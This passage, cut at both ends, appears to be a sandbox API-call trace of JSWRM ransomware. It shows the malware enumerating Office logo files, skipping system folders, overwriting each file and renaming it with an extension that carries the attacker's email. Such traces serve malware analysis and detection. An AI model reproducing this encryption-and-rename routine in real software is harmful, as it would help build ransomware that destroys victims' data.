office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.515] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198fbe19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f9, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-black_scale-140.png", cAlternateFileName="FIRSTR~3.PNG")) returned 1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0132.515] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0132.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0132.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0132.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.521] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2297) returned 1 [0132.521] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.521] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8f0, lpOverlapped=0x0) returned 1 [0132.568] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.568] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8f0, lpOverlapped=0x0) returned 1 [0132.568] CloseHandle (hObject=0x238) returned 1 [0132.568] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.570] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa81, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-black_scale-180.png", cAlternateFileName="FI9FD2~1.PNG")) returned 1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0132.570] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0132.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0132.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0132.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.571] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2689) returned 1 [0132.571] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.571] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa80, lpOverlapped=0x0) returned 1 [0132.574] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.574] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa80, lpOverlapped=0x0) returned 1 [0132.574] CloseHandle (hObject=0x238) returned 1 [0132.574] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.575] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-black_scale-80.png", cAlternateFileName="FI357C~1.PNG")) returned 1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0132.575] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0132.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0132.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0132.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0132.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0132.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.576] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1610) returned 1 [0132.576] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.576] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x640, lpOverlapped=0x0) returned 1 [0132.578] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.578] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x640, lpOverlapped=0x0) returned 1 [0132.578] CloseHandle (hObject=0x238) returned 1 [0132.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.579] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198fbe19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x75c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-white_scale-100.png", cAlternateFileName="FIRSTR~2.PNG")) returned 1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0132.580] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0132.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0132.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0132.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.581] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1884) returned 1 [0132.581] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.581] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x750, lpOverlapped=0x0) returned 1 [0132.582] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.582] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x750, lpOverlapped=0x0) returned 1 [0132.583] CloseHandle (hObject=0x238) returned 1 [0132.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.584] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198fbe19, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x95f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-white_scale-140.png", cAlternateFileName="FIRSTR~1.PNG")) returned 1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0132.584] lstrcmpiW (lpString1="FirstRunLogo.contrast-white_scale-140.png", lpString2="msocache") returned -1 [0132.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0132.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0132.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.585] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2399) returned 1 [0132.585] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.585] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x950, lpOverlapped=0x0) returned 1 [0132.587] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.587] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, 